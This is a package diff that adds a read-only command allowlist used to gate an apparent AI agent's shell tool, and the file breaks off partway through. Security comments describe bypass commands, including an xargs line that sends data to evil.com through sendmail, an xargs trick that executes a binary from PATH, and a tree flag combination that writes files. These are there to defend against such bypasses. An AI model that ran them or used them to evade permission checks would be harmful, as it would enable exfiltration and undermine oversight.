thaddeus 1.0.18 → 1.0.27

package/src/tools/BashTool/readOnlyValidation.js

@@ -0,0 +1,1794 @@
+import { getOriginalCwd } from '../../bootstrap/state.js';
+import { extractOutputRedirections, splitCommand_DEPRECATED, } from '../../utils/bash/commands.js';
+import { tryParseShellCommand } from '../../utils/bash/shellQuote.js';
+import { getCwd } from '../../utils/cwd.js';
+import { isCurrentDirectoryBareGitRepo } from '../../utils/git.js';
+import { getPlatform } from '../../utils/platform.js';
+import { SandboxManager } from '../../utils/sandbox/sandbox-adapter.js';
+import { containsVulnerableUncPath, DOCKER_READ_ONLY_COMMANDS, EXTERNAL_READONLY_COMMANDS, GH_READ_ONLY_COMMANDS, GIT_READ_ONLY_COMMANDS, PYRIGHT_READ_ONLY_COMMANDS, RIPGREP_READ_ONLY_COMMANDS, validateFlags, } from '../../utils/shell/readOnlyCommandValidation.js';
+import { isNormalizedGitCommand } from './bashPermissions.js';
+import { bashCommandIsSafe_DEPRECATED } from './bashSecurity.js';
+import { COMMAND_OPERATION_TYPE, PATH_EXTRACTORS, } from './pathValidation.js';
+import { sedCommandIsAllowedByAllowlist } from './sedValidation.js';
+// Shared safe flags for fd and fdfind (Debian/Ubuntu package name)
+// SECURITY: -x/--exec and -X/--exec-batch are deliberately excluded —
+// they execute arbitrary commands for each search result.
+const FD_SAFE_FLAGS = {
+    '-h': 'none',
+    '--help': 'none',
+    '-V': 'none',
+    '--version': 'none',
+    '-H': 'none',
+    '--hidden': 'none',
+    '-I': 'none',
+    '--no-ignore': 'none',
+    '--no-ignore-vcs': 'none',
+    '--no-ignore-parent': 'none',
+    '-s': 'none',
+    '--case-sensitive': 'none',
+    '-i': 'none',
+    '--ignore-case': 'none',
+    '-g': 'none',
+    '--glob': 'none',
+    '--regex': 'none',
+    '-F': 'none',
+    '--fixed-strings': 'none',
+    '-a': 'none',
+    '--absolute-path': 'none',
+    // SECURITY: -l/--list-details EXCLUDED — internally executes `ls` as subprocess (same
+    // pathway as --exec-batch). PATH hijacking risk if malicious `ls` is on PATH.
+    '-L': 'none',
+    '--follow': 'none',
+    '-p': 'none',
+    '--full-path': 'none',
+    '-0': 'none',
+    '--print0': 'none',
+    '-d': 'number',
+    '--max-depth': 'number',
+    '--min-depth': 'number',
+    '--exact-depth': 'number',
+    '-t': 'string',
+    '--type': 'string',
+    '-e': 'string',
+    '--extension': 'string',
+    '-S': 'string',
+    '--size': 'string',
+    '--changed-within': 'string',
+    '--changed-before': 'string',
+    '-o': 'string',
+    '--owner': 'string',
+    '-E': 'string',
+    '--exclude': 'string',
+    '--ignore-file': 'string',
+    '-c': 'string',
+    '--color': 'string',
+    '-j': 'number',
+    '--threads': 'number',
+    '--max-buffer-time': 'string',
+    '--max-results': 'number',
+    '-1': 'none',
+    '-q': 'none',
+    '--quiet': 'none',
+    '--show-errors': 'none',
+    '--strip-cwd-prefix': 'none',
+    '--one-file-system': 'none',
+    '--prune': 'none',
+    '--search-path': 'string',
+    '--base-directory': 'string',
+    '--path-separator': 'string',
+    '--batch-size': 'number',
+    '--no-require-git': 'none',
+    '--hyperlink': 'string',
+    '--and': 'string',
+    '--format': 'string',
+};
+// Central configuration for allowlist-based command validation
+// All commands and flags here should only allow reading files. They should not
+// allow writing to files, executing code, or creating network requests.
+const COMMAND_ALLOWLIST = {
+    xargs: {
+        safeFlags: {
+            '-I': '{}',
+            // SECURITY: `-i` and `-e` (lowercase) REMOVED — both use GNU getopt
+            // optional-attached-arg semantics (`i::`, `e::`). The arg MUST be
+            // attached (`-iX`, `-eX`); space-separated (`-i X`, `-e X`) means the
+            // flag takes NO arg and `X` becomes the next positional (target command).
+            //
+            // `-i` (`i::` — optional replace-str):
+            //   echo /usr/sbin/sendm | xargs -it tail a@evil.com
+            //   validator: -it bundle (both 'none') OK, tail ∈ SAFE_TARGET → break
+            //   GNU: -i replace-str=t, tail → /usr/sbin/sendmail → NETWORK EXFIL
+            //
+            // `-e` (`e::` — optional eof-str):
+            //   cat data | xargs -e EOF echo foo
+            //   validator: -e consumes 'EOF' as arg (type 'EOF'), echo ∈ SAFE_TARGET
+            //   GNU: -e no attached arg → no eof-str, 'EOF' is the TARGET COMMAND
+            //   → executes binary named EOF from PATH → CODE EXEC (malicious repo)
+            //
+            // Use uppercase `-I {}` (mandatory arg) and `-E EOF` (POSIX, mandatory
+            // arg) instead — both validator and xargs agree on argument consumption.
+            // `-i`/`-e` are deprecated (GNU: "use -I instead" / "use -E instead").
+            '-n': 'number',
+            '-P': 'number',
+            '-L': 'number',
+            '-s': 'number',
+            '-E': 'EOF', // POSIX, MANDATORY separate arg — validator & xargs agree
+            '-0': 'none',
+            '-t': 'none',
+            '-r': 'none',
+            '-x': 'none',
+            '-d': 'char',
+        },
+    },
+    // All git read-only commands from shared validation map
+    ...GIT_READ_ONLY_COMMANDS,
+    file: {
+        safeFlags: {
+            // Output format flags
+            '--brief': 'none',
+            '-b': 'none',
+            '--mime': 'none',
+            '-i': 'none',
+            '--mime-type': 'none',
+            '--mime-encoding': 'none',
+            '--apple': 'none',
+            // Behavior flags
+            '--check-encoding': 'none',
+            '-c': 'none',
+            '--exclude': 'string',
+            '--exclude-quiet': 'string',
+            '--print0': 'none',
+            '-0': 'none',
+            '-f': 'string',
+            '-F': 'string',
+            '--separator': 'string',
+            '--help': 'none',
+            '--version': 'none',
+            '-v': 'none',
+            // Following/dereferencing
+            '--no-dereference': 'none',
+            '-h': 'none',
+            '--dereference': 'none',
+            '-L': 'none',
+            // Magic file options (safe when just reading)
+            '--magic-file': 'string',
+            '-m': 'string',
+            // Other safe options
+            '--keep-going': 'none',
+            '-k': 'none',
+            '--list': 'none',
+            '-l': 'none',
+            '--no-buffer': 'none',
+            '-n': 'none',
+            '--preserve-date': 'none',
+            '-p': 'none',
+            '--raw': 'none',
+            '-r': 'none',
+            '-s': 'none',
+            '--special-files': 'none',
+            // Uncompress flag for archives
+            '--uncompress': 'none',
+            '-z': 'none',
+        },
+    },
+    sed: {
+        safeFlags: {
+            // Expression flags
+            '--expression': 'string',
+            '-e': 'string',
+            // Output control
+            '--quiet': 'none',
+            '--silent': 'none',
+            '-n': 'none',
+            // Extended regex
+            '--regexp-extended': 'none',
+            '-r': 'none',
+            '--posix': 'none',
+            '-E': 'none',
+            // Line handling
+            '--line-length': 'number',
+            '-l': 'number',
+            '--zero-terminated': 'none',
+            '-z': 'none',
+            '--separate': 'none',
+            '-s': 'none',
+            '--unbuffered': 'none',
+            '-u': 'none',
+            // Debugging/help
+            '--debug': 'none',
+            '--help': 'none',
+            '--version': 'none',
+        },
+        additionalCommandIsDangerousCallback: (rawCommand, _args) => !sedCommandIsAllowedByAllowlist(rawCommand),
+    },
+    sort: {
+        safeFlags: {
+            // Sorting options
+            '--ignore-leading-blanks': 'none',
+            '-b': 'none',
+            '--dictionary-order': 'none',
+            '-d': 'none',
+            '--ignore-case': 'none',
+            '-f': 'none',
+            '--general-numeric-sort': 'none',
+            '-g': 'none',
+            '--human-numeric-sort': 'none',
+            '-h': 'none',
+            '--ignore-nonprinting': 'none',
+            '-i': 'none',
+            '--month-sort': 'none',
+            '-M': 'none',
+            '--numeric-sort': 'none',
+            '-n': 'none',
+            '--random-sort': 'none',
+            '-R': 'none',
+            '--reverse': 'none',
+            '-r': 'none',
+            '--sort': 'string',
+            '--stable': 'none',
+            '-s': 'none',
+            '--unique': 'none',
+            '-u': 'none',
+            '--version-sort': 'none',
+            '-V': 'none',
+            '--zero-terminated': 'none',
+            '-z': 'none',
+            // Key specifications
+            '--key': 'string',
+            '-k': 'string',
+            '--field-separator': 'string',
+            '-t': 'string',
+            // Checking
+            '--check': 'none',
+            '-c': 'none',
+            '--check-char-order': 'none',
+            '-C': 'none',
+            // Merging
+            '--merge': 'none',
+            '-m': 'none',
+            // Buffer size
+            '--buffer-size': 'string',
+            '-S': 'string',
+            // Parallel processing
+            '--parallel': 'number',
+            // Batch size
+            '--batch-size': 'number',
+            // Help and version
+            '--help': 'none',
+            '--version': 'none',
+        },
+    },
+    man: {
+        safeFlags: {
+            // Safe display options
+            '-a': 'none', // Display all manual pages
+            '--all': 'none', // Same as -a
+            '-d': 'none', // Debug mode
+            '-f': 'none', // Emulate whatis
+            '--whatis': 'none', // Same as -f
+            '-h': 'none', // Help
+            '-k': 'none', // Emulate apropos
+            '--apropos': 'none', // Same as -k
+            '-l': 'string', // Local file (safe for reading, Linux only)
+            '-w': 'none', // Display location instead of content
+            // Safe formatting options
+            '-S': 'string', // Restrict manual sections
+            '-s': 'string', // Same as -S for whatis/apropos mode
+        },
+    },
+    // help command - only allow bash builtin help flags to prevent attacks when
+    // help is aliased to man (e.g., in oh-my-zsh common-aliases plugin).
+    // man's -P flag allows arbitrary command execution via pager.
+    help: {
+        safeFlags: {
+            '-d': 'none', // Output short description for each topic
+            '-m': 'none', // Display usage in pseudo-manpage format
+            '-s': 'none', // Output only a short usage synopsis
+        },
+    },
+    netstat: {
+        safeFlags: {
+            // Safe display options
+            '-a': 'none', // Show all sockets
+            '-L': 'none', // Show listen queue sizes
+            '-l': 'none', // Print full IPv6 address
+            '-n': 'none', // Show network addresses as numbers
+            // Safe filtering options
+            '-f': 'string', // Address family (inet, inet6, unix, vsock)
+            // Safe interface options
+            '-g': 'none', // Show multicast group membership
+            '-i': 'none', // Show interface state
+            '-I': 'string', // Specific interface
+            // Safe statistics options
+            '-s': 'none', // Show per-protocol statistics
+            // Safe routing options
+            '-r': 'none', // Show routing tables
+            // Safe mbuf options
+            '-m': 'none', // Show memory management statistics
+            // Safe other options
+            '-v': 'none', // Increase verbosity
+        },
+    },
+    ps: {
+        safeFlags: {
+            // UNIX-style process selection (these are safe)
+            '-e': 'none', // Select all processes
+            '-A': 'none', // Select all processes (same as -e)
+            '-a': 'none', // Select all with tty except session leaders
+            '-d': 'none', // Select all except session leaders
+            '-N': 'none', // Negate selection
+            '--deselect': 'none',
+            // UNIX-style output format (safe, doesn't show env)
+            '-f': 'none', // Full format
+            '-F': 'none', // Extra full format
+            '-l': 'none', // Long format
+            '-j': 'none', // Jobs format
+            '-y': 'none', // Don't show flags
+            // Output modifiers (safe ones)
+            '-w': 'none', // Wide output
+            '-ww': 'none', // Unlimited width
+            '--width': 'number',
+            '-c': 'none', // Show scheduler info
+            '-H': 'none', // Show process hierarchy
+            '--forest': 'none',
+            '--headers': 'none',
+            '--no-headers': 'none',
+            '-n': 'string', // Set namelist file
+            '--sort': 'string',
+            // Thread display
+            '-L': 'none', // Show threads
+            '-T': 'none', // Show threads
+            '-m': 'none', // Show threads after processes
+            // Process selection by criteria
+            '-C': 'string', // By command name
+            '-G': 'string', // By real group ID
+            '-g': 'string', // By session or effective group
+            '-p': 'string', // By PID
+            '--pid': 'string',
+            '-q': 'string', // Quick mode by PID
+            '--quick-pid': 'string',
+            '-s': 'string', // By session ID
+            '--sid': 'string',
+            '-t': 'string', // By tty
+            '--tty': 'string',
+            '-U': 'string', // By real user ID
+            '-u': 'string', // By effective user ID
+            '--user': 'string',
+            // Help/version
+            '--help': 'none',
+            '--info': 'none',
+            '-V': 'none',
+            '--version': 'none',
+        },
+        // Block BSD-style 'e' modifier which shows environment variables
+        // BSD options are letter-only tokens without a leading dash
+        additionalCommandIsDangerousCallback: (_rawCommand, args) => {
+            // Check for BSD-style 'e' in letter-only tokens (not -e which is UNIX-style)
+            // A BSD-style option is a token of only letters (no leading dash) containing 'e'
+            return args.some(a => !a.startsWith('-') && /^[a-zA-Z]*e[a-zA-Z]*$/.test(a));
+        },
+    },
+    base64: {
+        respectsDoubleDash: false, // macOS base64 does not respect POSIX --
+        safeFlags: {
+            // Safe decode options
+            '-d': 'none', // Decode
+            '-D': 'none', // Decode (macOS)
+            '--decode': 'none', // Decode
+            // Safe formatting options
+            '-b': 'number', // Break lines at num (macOS)
+            '--break': 'number', // Break lines at num (macOS)
+            '-w': 'number', // Wrap lines at COLS (Linux)
+            '--wrap': 'number', // Wrap lines at COLS (Linux)
+            // Safe input options (read from file, not write)
+            '-i': 'string', // Input file (safe for reading)
+            '--input': 'string', // Input file (safe for reading)
+            // Safe misc options
+            '--ignore-garbage': 'none', // Ignore non-alphabet chars when decoding (Linux)
+            '-h': 'none', // Help
+            '--help': 'none', // Help
+            '--version': 'none', // Version
+        },
+    },
+    grep: {
+        safeFlags: {
+            // Pattern flags
+            '-e': 'string', // Pattern
+            '--regexp': 'string',
+            '-f': 'string', // File with patterns
+            '--file': 'string',
+            '-F': 'none', // Fixed strings
+            '--fixed-strings': 'none',
+            '-G': 'none', // Basic regexp (default)
+            '--basic-regexp': 'none',
+            '-E': 'none', // Extended regexp
+            '--extended-regexp': 'none',
+            '-P': 'none', // Perl regexp
+            '--perl-regexp': 'none',
+            // Matching control
+            '-i': 'none', // Ignore case
+            '--ignore-case': 'none',
+            '--no-ignore-case': 'none',
+            '-v': 'none', // Invert match
+            '--invert-match': 'none',
+            '-w': 'none', // Word regexp
+            '--word-regexp': 'none',
+            '-x': 'none', // Line regexp
+            '--line-regexp': 'none',
+            // Output control
+            '-c': 'none', // Count
+            '--count': 'none',
+            '--color': 'string',
+            '--colour': 'string',
+            '-L': 'none', // Files without match
+            '--files-without-match': 'none',
+            '-l': 'none', // Files with matches
+            '--files-with-matches': 'none',
+            '-m': 'number', // Max count
+            '--max-count': 'number',
+            '-o': 'none', // Only matching
+            '--only-matching': 'none',
+            '-q': 'none', // Quiet
+            '--quiet': 'none',
+            '--silent': 'none',
+            '-s': 'none', // No messages
+            '--no-messages': 'none',
+            // Output line prefix
+            '-b': 'none', // Byte offset
+            '--byte-offset': 'none',
+            '-H': 'none', // With filename
+            '--with-filename': 'none',
+            '-h': 'none', // No filename
+            '--no-filename': 'none',
+            '--label': 'string',
+            '-n': 'none', // Line number
+            '--line-number': 'none',
+            '-T': 'none', // Initial tab
+            '--initial-tab': 'none',
+            '-u': 'none', // Unix byte offsets
+            '--unix-byte-offsets': 'none',
+            '-Z': 'none', // Null after filename
+            '--null': 'none',
+            '-z': 'none', // Null data
+            '--null-data': 'none',
+            // Context control
+            '-A': 'number', // After context
+            '--after-context': 'number',
+            '-B': 'number', // Before context
+            '--before-context': 'number',
+            '-C': 'number', // Context
+            '--context': 'number',
+            '--group-separator': 'string',
+            '--no-group-separator': 'none',
+            // File and directory selection
+            '-a': 'none', // Text (process binary as text)
+            '--text': 'none',
+            '--binary-files': 'string',
+            '-D': 'string', // Devices
+            '--devices': 'string',
+            '-d': 'string', // Directories
+            '--directories': 'string',
+            '--exclude': 'string',
+            '--exclude-from': 'string',
+            '--exclude-dir': 'string',
+            '--include': 'string',
+            '-r': 'none', // Recursive
+            '--recursive': 'none',
+            '-R': 'none', // Dereference-recursive
+            '--dereference-recursive': 'none',
+            // Other options
+            '--line-buffered': 'none',
+            '-U': 'none', // Binary
+            '--binary': 'none',
+            // Help and version
+            '--help': 'none',
+            '-V': 'none',
+            '--version': 'none',
+        },
+    },
+    ...RIPGREP_READ_ONLY_COMMANDS,
+    // Checksum commands - these only read files and compute/verify hashes
+    // All flags are safe as they only affect output format or verification behavior
+    sha256sum: {
+        safeFlags: {
+            // Mode flags
+            '-b': 'none', // Binary mode
+            '--binary': 'none',
+            '-t': 'none', // Text mode
+            '--text': 'none',
+            // Check/verify flags
+            '-c': 'none', // Verify checksums from file
+            '--check': 'none',
+            '--ignore-missing': 'none', // Ignore missing files during check
+            '--quiet': 'none', // Quiet mode during check
+            '--status': 'none', // Don't output, exit code shows success
+            '--strict': 'none', // Exit non-zero for improperly formatted lines
+            '-w': 'none', // Warn about improperly formatted lines
+            '--warn': 'none',
+            // Output format flags
+            '--tag': 'none', // BSD-style output
+            '-z': 'none', // End output lines with NUL
+            '--zero': 'none',
+            // Help and version
+            '--help': 'none',
+            '--version': 'none',
+        },
+    },
+    sha1sum: {
+        safeFlags: {
+            // Mode flags
+            '-b': 'none', // Binary mode
+            '--binary': 'none',
+            '-t': 'none', // Text mode
+            '--text': 'none',
+            // Check/verify flags
+            '-c': 'none', // Verify checksums from file
+            '--check': 'none',
+            '--ignore-missing': 'none', // Ignore missing files during check
+            '--quiet': 'none', // Quiet mode during check
+            '--status': 'none', // Don't output, exit code shows success
+            '--strict': 'none', // Exit non-zero for improperly formatted lines
+            '-w': 'none', // Warn about improperly formatted lines
+            '--warn': 'none',
+            // Output format flags
+            '--tag': 'none', // BSD-style output
+            '-z': 'none', // End output lines with NUL
+            '--zero': 'none',
+            // Help and version
+            '--help': 'none',
+            '--version': 'none',
+        },
+    },
+    md5sum: {
+        safeFlags: {
+            // Mode flags
+            '-b': 'none', // Binary mode
+            '--binary': 'none',
+            '-t': 'none', // Text mode
+            '--text': 'none',
+            // Check/verify flags
+            '-c': 'none', // Verify checksums from file
+            '--check': 'none',
+            '--ignore-missing': 'none', // Ignore missing files during check
+            '--quiet': 'none', // Quiet mode during check
+            '--status': 'none', // Don't output, exit code shows success
+            '--strict': 'none', // Exit non-zero for improperly formatted lines
+            '-w': 'none', // Warn about improperly formatted lines
+            '--warn': 'none',
+            // Output format flags
+            '--tag': 'none', // BSD-style output
+            '-z': 'none', // End output lines with NUL
+            '--zero': 'none',
+            // Help and version
+            '--help': 'none',
+            '--version': 'none',
+        },
+    },
+    // tree command - moved from READONLY_COMMAND_REGEXES to allow flags and path arguments
+    // -o/--output writes to a file, so it's excluded. All other flags are display/filter options.
+    tree: {
+        safeFlags: {
+            // Listing options
+            '-a': 'none', // All files
+            '-d': 'none', // Directories only
+            '-l': 'none', // Follow symlinks
+            '-f': 'none', // Full path prefix
+            '-x': 'none', // Stay on current filesystem
+            '-L': 'number', // Max depth
+            // SECURITY: -R REMOVED. tree -R combined with -H (HTML mode) and -L (depth)
+            // WRITES 00Tree.html files to every subdirectory at the depth boundary.
+            // From man tree (< 2.1.0): "-R — at each of them execute tree again
+            // adding `-o 00Tree.html` as a new option." The comment "Rerun at max
+            // depth" was misleading — the "rerun" includes a hardcoded -o file write.
+            // `tree -R -H . -L 2 /path` → writes /path/<subdir>/00Tree.html for each
+            // subdir at depth 2. FILE WRITE, zero permissions.
+            '-P': 'string', // Include pattern
+            '-I': 'string', // Exclude pattern
+            '--gitignore': 'none',
+            '--gitfile': 'string',
+            '--ignore-case': 'none',
+            '--matchdirs': 'none',
+            '--metafirst': 'none',
+            '--prune': 'none',
+            '--info': 'none',
+            '--infofile': 'string',
+            '--noreport': 'none',
+            '--charset': 'string',
+            '--filelimit': 'number',
+            // File display options
+            '-q': 'none', // Non-printable as ?
+            '-N': 'none', // Non-printable as-is
+            '-Q': 'none', // Quote filenames
+            '-p': 'none', // Protections
+            '-u': 'none', // Owner
+            '-g': 'none', // Group
+            '-s': 'none', // Size bytes
+            '-h': 'none', // Human-readable sizes
+            '--si': 'none',
+            '--du': 'none',
+            '-D': 'none', // Last modification time
+            '--timefmt': 'string',
+            '-F': 'none', // Append indicator
+            '--inodes': 'none',
+            '--device': 'none',
+            // Sorting options
+            '-v': 'none', // Version sort
+            '-t': 'none', // Sort by mtime
+            '-c': 'none', // Sort by ctime
+            '-U': 'none', // Unsorted
+            '-r': 'none', // Reverse sort
+            '--dirsfirst': 'none',
+            '--filesfirst': 'none',
+            '--sort': 'string',
+            // Graphics/output options
+            '-i': 'none', // No indentation lines
+            '-A': 'none', // ANSI line graphics
+            '-S': 'none', // CP437 line graphics
+            '-n': 'none', // No color
+            '-C': 'none', // Color
+            '-X': 'none', // XML output
+            '-J': 'none', // JSON output
+            '-H': 'string', // HTML output with base HREF
+            '--nolinks': 'none',
+            '--hintro': 'string',
+            '--houtro': 'string',
+            '-T': 'string', // HTML title
+            '--hyperlink': 'none',
+            '--scheme': 'string',
+            '--authority': 'string',
+            // Input options (read from file, not write)
+            '--fromfile': 'none',
+            '--fromtabfile': 'none',
+            '--fflinks': 'none',
+            // Help and version
+            '--help': 'none',
+            '--version': 'none',
+        },
+    },
+    // date command - moved from READONLY_COMMANDS because -s/--set can set system time
+    // Also -f/--file can be used to read dates from file and set time
+    // We only allow safe display options
+    date: {
+        safeFlags: {
+            // Display options (safe - don't modify system time)
+            '-d': 'string', // --date=STRING - display time described by STRING
+            '--date': 'string',
+            '-r': 'string', // --reference=FILE - display file's modification time
+            '--reference': 'string',
+            '-u': 'none', // --utc - use UTC
+            '--utc': 'none',
+            '--universal': 'none',
+            // Output format options
+            '-I': 'none', // --iso-8601 (can have optional argument, but none type handles bare flag)
+            '--iso-8601': 'string',
+            '-R': 'none', // --rfc-email
+            '--rfc-email': 'none',
+            '--rfc-3339': 'string',
+            // Debug/help
+            '--debug': 'none',
+            '--help': 'none',
+            '--version': 'none',
+        },
+        // Dangerous flags NOT included (blocked by omission):
+        // -s / --set - sets system time
+        // -f / --file - reads dates from file (can be used to set time in batch)
+        // CRITICAL: date positional args in format MMDDhhmm[[CC]YY][.ss] set system time
+        // Use callback to verify positional args start with + (format strings like +"%Y-%m-%d")
+        additionalCommandIsDangerousCallback: (_rawCommand, args) => {
+            // args are already parsed tokens after "date"
+            // Flags that require an argument
+            const flagsWithArgs = new Set([
+                '-d',
+                '--date',
+                '-r',
+                '--reference',
+                '--iso-8601',
+                '--rfc-3339',
+            ]);
+            let i = 0;
+            while (i < args.length) {
+                const token = args[i];
+                // Skip flags and their arguments
+                if (token.startsWith('--') && token.includes('=')) {
+                    // Long flag with =value, already consumed
+                    i++;
+                }
+                else if (token.startsWith('-')) {
+                    // Flag - check if it takes an argument
+                    if (flagsWithArgs.has(token)) {
+                        i += 2; // Skip flag and its argument
+                    }
+                    else {
+                        i++; // Just skip the flag
+                    }
+                }
+                else {
+                    // Positional argument - must start with + for format strings
+                    // Anything else (like MMDDhhmm) could set system time
+                    if (!token.startsWith('+')) {
+                        return true; // Dangerous
+                    }
+                    i++;
+                }
+            }
+            return false; // Safe
+        },
+    },
+    // hostname command - moved from READONLY_COMMANDS because positional args set hostname
+    // Also -F/--file sets hostname from file, -b/--boot sets default hostname
+    // We only allow safe display options and BLOCK any positional arguments
+    hostname: {
+        safeFlags: {
+            // Display options only (safe)
+            '-f': 'none', // --fqdn - display FQDN
+            '--fqdn': 'none',
+            '--long': 'none',
+            '-s': 'none', // --short - display short name
+            '--short': 'none',
+            '-i': 'none', // --ip-address
+            '--ip-address': 'none',
+            '-I': 'none', // --all-ip-addresses
+            '--all-ip-addresses': 'none',
+            '-a': 'none', // --alias
+            '--alias': 'none',
+            '-d': 'none', // --domain
+            '--domain': 'none',
+            '-A': 'none', // --all-fqdns
+            '--all-fqdns': 'none',
+            '-v': 'none', // --verbose
+            '--verbose': 'none',
+            '-h': 'none', // --help
+            '--help': 'none',
+            '-V': 'none', // --version
+            '--version': 'none',
+        },
+        // CRITICAL: Block any positional arguments - they set the hostname
+        // Also block -F/--file, -b/--boot, -y/--yp/--nis (not in safeFlags = blocked)
+        // Use regex to ensure no positional args after flags
+        regex: /^hostname(?:\s+(?:-[a-zA-Z]|--[a-zA-Z-]+))*\s*$/,
+    },
+    // info command - moved from READONLY_COMMANDS because -o/--output writes to files
+    // Also --dribble writes keystrokes to file, --init-file loads custom config
+    // We only allow safe display/navigation options
+    info: {
+        safeFlags: {
+            // Navigation/display options (safe)
+            '-f': 'string', // --file - specify manual file to read
+            '--file': 'string',
+            '-d': 'string', // --directory - search path
+            '--directory': 'string',
+            '-n': 'string', // --node - specify node
+            '--node': 'string',
+            '-a': 'none', // --all
+            '--all': 'none',
+            '-k': 'string', // --apropos - search
+            '--apropos': 'string',
+            '-w': 'none', // --where - show location
+            '--where': 'none',
+            '--location': 'none',
+            '--show-options': 'none',
+            '--vi-keys': 'none',
+            '--subnodes': 'none',
+            '-h': 'none',
+            '--help': 'none',
+            '--usage': 'none',
+            '--version': 'none',
+        },
+        // Dangerous flags NOT included (blocked by omission):
+        // -o / --output - writes output to file
+        // --dribble - records keystrokes to file
+        // --init-file - loads custom config (potential code execution)
+        // --restore - replays keystrokes from file
+    },
+    lsof: {
+        safeFlags: {
+            '-?': 'none',
+            '-h': 'none',
+            '-v': 'none',
+            '-a': 'none',
+            '-b': 'none',
+            '-C': 'none',
+            '-l': 'none',
+            '-n': 'none',
+            '-N': 'none',
+            '-O': 'none',
+            '-P': 'none',
+            '-Q': 'none',
+            '-R': 'none',
+            '-t': 'none',
+            '-U': 'none',
+            '-V': 'none',
+            '-X': 'none',
+            '-H': 'none',
+            '-E': 'none',
+            '-F': 'none',
+            '-g': 'none',
+            '-i': 'none',
+            '-K': 'none',
+            '-L': 'none',
+            '-o': 'none',
+            '-r': 'none',
+            '-s': 'none',
+            '-S': 'none',
+            '-T': 'none',
+            '-x': 'none',
+            '-A': 'string',
+            '-c': 'string',
+            '-d': 'string',
+            '-e': 'string',
+            '-k': 'string',
+            '-p': 'string',
+            '-u': 'string',
+            // OMITTED (writes to disk): -D (device cache file build/update)
+        },
+        // Block +m (create mount supplement file) — writes to disk.
+        // +prefix flags are treated as positional args by validateFlags,
+        // so we must catch them here. lsof accepts +m<path> (attached path, no space)
+        // with both absolute (+m/tmp/evil) and relative (+mfoo, +m.evil) paths.
+        additionalCommandIsDangerousCallback: (_rawCommand, args) => args.some(a => a === '+m' || a.startsWith('+m')),
+    },
+    pgrep: {
+        safeFlags: {
+            '-d': 'string',
+            '--delimiter': 'string',
+            '-l': 'none',
+            '--list-name': 'none',
+            '-a': 'none',
+            '--list-full': 'none',
+            '-v': 'none',
+            '--inverse': 'none',
+            '-w': 'none',
+            '--lightweight': 'none',
+            '-c': 'none',
+            '--count': 'none',
+            '-f': 'none',
+            '--full': 'none',
+            '-g': 'string',
+            '--pgroup': 'string',
+            '-G': 'string',
+            '--group': 'string',
+            '-i': 'none',
+            '--ignore-case': 'none',
+            '-n': 'none',
+            '--newest': 'none',
+            '-o': 'none',
+            '--oldest': 'none',
+            '-O': 'string',
+            '--older': 'string',
+            '-P': 'string',
+            '--parent': 'string',
+            '-s': 'string',
+            '--session': 'string',
+            '-t': 'string',
+            '--terminal': 'string',
+            '-u': 'string',
+            '--euid': 'string',
+            '-U': 'string',
+            '--uid': 'string',
+            '-x': 'none',
+            '--exact': 'none',
+            '-F': 'string',
+            '--pidfile': 'string',
+            '-L': 'none',
+            '--logpidfile': 'none',
+            '-r': 'string',
+            '--runstates': 'string',
+            '--ns': 'string',
+            '--nslist': 'string',
+            '--help': 'none',
+            '-V': 'none',
+            '--version': 'none',
+        },
+    },
+    tput: {
+        safeFlags: {
+            '-T': 'string',
+            '-V': 'none',
+            '-x': 'none',
+            // SECURITY: -S (read capability names from stdin) deliberately EXCLUDED.
+            // It must NOT be in safeFlags because validateFlags unbundles combined
+            // short flags (e.g., -xS → -x + -S), but the callback receives the raw
+            // token '-xS' and only checks exact match 'token === "-S"'. Excluding -S
+            // from safeFlags ensures validateFlags rejects it (bundled or not) before
+            // the callback runs. The callback's -S check is defense-in-depth.
+        },
+        additionalCommandIsDangerousCallback: (_rawCommand, args) => {
+            // Capabilities that modify terminal state or could be harmful.
+            // init/reset run iprog (arbitrary code from terminfo) and modify tty settings.
+            // rs1/rs2/rs3/is1/is2/is3 are the individual reset/init sequences that
+            // init/reset invoke internally — rs1 sends ESC c (full terminal reset).
+            // clear erases scrollback (evidence destruction). mc5/mc5p activate media copy
+            // (redirect output to printer device). smcup/rmcup manipulate screen buffer.
+            // pfkey/pfloc/pfx/pfxl program function keys — pfloc executes strings locally.
+            // rf is reset file (analogous to if/init_file).
+            const DANGEROUS_CAPABILITIES = new Set([
+                'init',
+                'reset',
+                'rs1',
+                'rs2',
+                'rs3',
+                'is1',
+                'is2',
+                'is3',
+                'iprog',
+                'if',
+                'rf',
+                'clear',
+                'flash',
+                'mc0',
+                'mc4',
+                'mc5',
+                'mc5i',
+                'mc5p',
+                'pfkey',
+                'pfloc',
+                'pfx',
+                'pfxl',
+                'smcup',
+                'rmcup',
+            ]);
+            const flagsWithArgs = new Set(['-T']);
+            let i = 0;
+            let afterDoubleDash = false;
+            while (i < args.length) {
+                const token = args[i];
+                if (token === '--') {
+                    afterDoubleDash = true;
+                    i++;
+                }
+                else if (!afterDoubleDash && token.startsWith('-')) {
+                    // Defense-in-depth: block -S even if it somehow passes validateFlags
+                    if (token === '-S')
+                        return true;
+                    // Also check for -S bundled with other flags (e.g., -xS)
+                    if (!token.startsWith('--') &&
+                        token.length > 2 &&
+                        token.includes('S'))
+                        return true;
+                    if (flagsWithArgs.has(token)) {
+                        i += 2;
+                    }
+                    else {
+                        i++;
+                    }
+                }
+                else {
+                    if (DANGEROUS_CAPABILITIES.has(token))
+                        return true;
+                    i++;
+                }
+            }
+            return false;
+        },
+    },
+    // ss — socket statistics (iproute2). Read-only query tool equivalent to netstat.
+    // SECURITY: -K/--kill (forcibly close sockets) and -D/--diag (dump raw data to file)
+    // are deliberately excluded. -F/--filter (read filter from file) also excluded.
+    ss: {
+        safeFlags: {
+            '-h': 'none',
+            '--help': 'none',
+            '-V': 'none',
+            '--version': 'none',
+            '-n': 'none',
+            '--numeric': 'none',
+            '-r': 'none',
+            '--resolve': 'none',
+            '-a': 'none',
+            '--all': 'none',
+            '-l': 'none',
+            '--listening': 'none',
+            '-o': 'none',
+            '--options': 'none',
+            '-e': 'none',
+            '--extended': 'none',
+            '-m': 'none',
+            '--memory': 'none',
+            '-p': 'none',
+            '--processes': 'none',
+            '-i': 'none',
+            '--info': 'none',
+            '-s': 'none',
+            '--summary': 'none',
+            '-4': 'none',
+            '--ipv4': 'none',
+            '-6': 'none',
+            '--ipv6': 'none',
+            '-0': 'none',
+            '--packet': 'none',
+            '-t': 'none',
+            '--tcp': 'none',
+            '-M': 'none',
+            '--mptcp': 'none',
+            '-S': 'none',
+            '--sctp': 'none',
+            '-u': 'none',
+            '--udp': 'none',
+            '-d': 'none',
